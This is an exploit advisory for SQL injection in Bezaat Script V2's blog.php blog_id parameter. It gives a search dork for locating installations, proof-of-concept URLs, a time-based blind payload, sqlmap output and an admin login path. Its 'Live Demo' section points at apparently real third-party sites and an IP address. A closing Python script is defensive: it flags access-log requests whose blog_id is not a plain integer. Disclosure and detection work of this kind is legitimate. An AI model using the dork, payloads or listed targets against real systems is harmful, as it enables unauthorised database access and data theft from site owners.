Bezaat Script 2 SQL Injection
Posted on 15 September 2016
######################
# Exploit Title : Bezaat Script V2 SQL Injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : Powed by Greenit Egypt for Information Technology
# Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 15/09/2016
# video Proof : https://youtu.be/psHqU3Ldo5Q
######################
# [a] DESCRIPTION :
######################
# [+] Bezaat Script is a commerce script
# [+] that allows you to add and manage ads on your website
# [+] An SQL injection has been detected in version 2 of this script
# [+] Other versions may also be affected
######################
# [a] PoC :
######################
# When you add ['] to the vulnerable parameter, you will see a warning with SQL errors
# http://127.0.0.1/blog/blog.php?blog_id=[SQLi]
# [id] GET parameter vulnerable to SQLi
# http://127.0.0.1/blog/blog.php?blog_id=1'
######################
# [a] SQLmap PoC:
######################
# Parameter: blog_id (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: blog_id=1 AND SLEEP(5)
#---
#[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
#[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
#[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
#[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
#[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive
#
# GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
######################
# [a] Live Demo :
######################
# http://al3ta.com/blog/blog.php?blog_id=1
# http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4
######################
# [a] Admin Dashboard :
######################
# http://127.0.0.1/admin/adminlogin.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################
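
For operators of this script, both PoC requests above leave the same trace in a web-server access log: a blog_id value that is not a plain integer. The Python check below is an added example, not part of the original advisory; the log lines are constructed samples in combined log format, and the function name and the 10-digit limit are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [15/Sep/2016:14:19:40 +0000] "GET /blog/blog.php?blog_id=4 HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [15/Sep/2016:14:19:41 +0000] "GET /blog/blog.php?blog_id=1%27 HTTP/1.1" 200 734 "-" "-"
198.51.100.9 - - [15/Sep/2016:14:19:45 +0000] "GET /blog/blog.php?blog_id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "-"
198.51.100.7 - - [15/Sep/2016:14:20:02 +0000] "GET /blog/blog.php HTTP/1.1" 200 5120 "-" "-"
198.51.100.8 - - [15/Sep/2016:14:20:05 +0000] "GET /index.php?blog_id=abc HTTP/1.1" 200 100 "-" "-"
"""

# client, timestamp, full request line, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) ')
# A legitimate blog_id is a short run of ASCII digits and nothing else.
INT_RE = re.compile(r'[0-9]{1,10}')


def suspicious_blog_requests(log_text, path_suffix="/blog/blog.php", param="blog_id"):
    """Return requests to blog.php whose blog_id is not a single plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, when, request, status = m.groups()
        parts = request.split(" ")
        if len(parts) < 3:
            continue
        # Rejoin the middle so a target logged with raw spaces is not truncated.
        url = urlsplit(" ".join(parts[1:-1]))
        if not url.path.endswith(path_suffix):
            continue
        # parse_qs percent-decodes, so %27 and %20 are compared in decoded form.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        bad = [v for v in values if not INT_RE.fullmatch(v)]
        if bad or len(values) > 1:  # repeated parameter is also unexpected
            findings.append({"client": client, "time": when,
                             "status": int(status), "values": values})
    return findings


if __name__ == "__main__":
    for hit in suspicious_blog_requests(SAMPLE_LOG):
        print(hit)
```

The same strict-integer test applied to blog_id inside blog.php, before the value reaches the query, rejects both payloads shown in the PoC.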